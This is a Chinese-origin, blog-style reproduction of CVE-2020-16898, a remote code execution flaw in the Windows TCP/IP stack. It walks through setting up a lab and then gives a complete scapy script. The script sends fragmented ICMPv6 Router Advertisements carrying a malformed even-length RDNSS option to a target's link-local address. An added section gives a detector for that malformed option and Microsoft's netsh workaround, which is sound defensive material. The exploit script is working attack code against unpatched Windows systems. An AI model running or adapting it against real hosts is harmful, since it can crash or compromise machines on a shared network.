(CVE-2020-16898) Windows TCP/IP Remote Code Execution Vulnerability: exploit reproduction


CVE-2020-16898 Microsoft TCP/IP Remote Code Execution Vulnerability

Affected versions:

(screenshot)

Download the Windows 10 image, version 1909:

ed2k://|file|cn_windows_10_business_editions_version_1909_x64_dvd_0ca83907.iso|5275090944|9BCD5FA6C8009E4D0260E4B23008BD47|/

Tested version:

(screenshot)

Install scapy:

pip3 install scapy

Get the target machine's IPv6 address:

(screenshot)

   IPv6 地址 . . . . . . . . . . . . : fd15:4ba5:5a2b:1008:940f:5491:31c4:c4ff
   临时 IPv6 地址. . . . . . . . . . : fd15:4ba5:5a2b:1008:8024:287d:cfc5:17e2
   本地链接 IPv6 地址. . . . . . . . : fe80::940f:5491:31c4:c4ff%7

Any of these addresses will do.

Get the attacking machine's IPv6 address:

(screenshot)

  本地链接 IPv6 地址. . . . . . . . : fe80::588b:30b8:bc:589f%17

(screenshot)

Launch the attack:

(screenshot)

Exploit script:

```python
from scapy.all import *
from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6

# Link-local addresses from the ipconfig output above (zone index included)
v6_dst = "fe80::940f:5491:31c4:c4ff%7"
v6_src = "fe80::588b:30b8:bc:589f%17"

# Filler bytes placed in the Raw payload between the options
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4   # defined in the original script but not used

c = ICMPv6NDOptEFA()

# RDNSS option with a valid, odd length (21 = 1 + 2 * 10 addresses)
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

# RDNSS option with an even length (8). RFC 8106 requires an odd length,
# and this malformed option is what the vulnerable tcpip.sys mishandles.
aaa = ICMPv6NDOptRDNSS()
aaa.len = 8

# Router Advertisement carrying the malformed option followed by filler and valid options
pkt = ICMPv6ND_RA() / aaa / \
    Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
    IPv6ExtHdrFragment()/pkt

# Split into 200-byte IPv6 fragments; the target reassembles them
l = fragment6(p_test_frag, 200)

for p in l:
    send(p)
```
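As an added defender-side example (not part of the original post), a pure-Python check that walks the ND option TLVs of a reassembled Router Advertisement and flags RDNSS options whose Length is even or below 3, the malformed framing this PoC relies on (`aaa.len = 8`). The packet bytes, option values and function names are constructed for the example.

```python
# Added example, not from the original post: validate RDNSS option framing in an
# ICMPv6 Router Advertisement. RFC 8106 requires Length = 1 + 2 * N (odd, >= 3);
# an even Length is the malformed input CVE-2020-16898 mishandles.
import struct

RA_HEADER_LEN = 16   # type, code, checksum, hop limit, flags, lifetime, reachable, retrans
OPT_SLLA = 1
OPT_RDNSS = 25

def nd_options(ra: bytes):
    """Yield (offset, type, length_units, option_bytes) for each option after the RA header."""
    off = RA_HEADER_LEN
    while off < len(ra):
        if off + 2 > len(ra) or ra[off + 1] == 0:
            raise ValueError("truncated or zero-length option at offset %d" % off)
        t, units = ra[off], ra[off + 1]
        yield off, t, units, ra[off:off + units * 8]
        off += units * 8

def find_bad_rdnss(ra: bytes):
    """Return (offset, length, reason) for every RDNSS option that breaks RFC 8106 framing."""
    findings = []
    for off, t, units, opt in nd_options(ra):
        if t != OPT_RDNSS:
            continue
        if units < 3 or units % 2 == 0:
            findings.append((off, units, "length %d is not odd and >= 3" % units))
        elif len(opt) < units * 8:
            findings.append((off, units, "option truncated by packet end"))
    return findings

def build_option(opt_type: int, units: int, body: bytes) -> bytes:
    """Constructed sample TLV: 2-byte header plus body padded/cut to units*8 bytes."""
    return bytes([opt_type, units]) + body.ljust(units * 8 - 2, b"\x00")[:units * 8 - 2]

# Constructed sample RA (type 134): a valid SLLA option, a valid one-address RDNSS
# (len 3), then an RDNSS with len 8 shaped like the PoC's malformed option.
SAMPLE_RA = (
    bytes([134, 0, 0, 0, 64, 0]) + struct.pack("!HII", 1800, 0, 0)
    + build_option(OPT_SLLA, 1, bytes.fromhex("001122334455"))
    + build_option(OPT_RDNSS, 3, b"\x00\x00" + struct.pack("!I", 600) + bytes.fromhex("20010db8") + b"\x00" * 12)
    + build_option(OPT_RDNSS, 8, b"\x00\x00" + struct.pack("!I", 600) + b"A" * 56)
)

if __name__ == "__main__":
    for off, units, reason in find_bad_rdnss(SAMPLE_RA):
        print("offset %d: RDNSS len=%d -> %s" % (off, units, reason))
```

For unpatched hosts, Microsoft's published workaround is to disable RA-based DNS configuration per interface with `netsh int ipv6 set int <interface index> rabaseddnsconfig=disable`.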
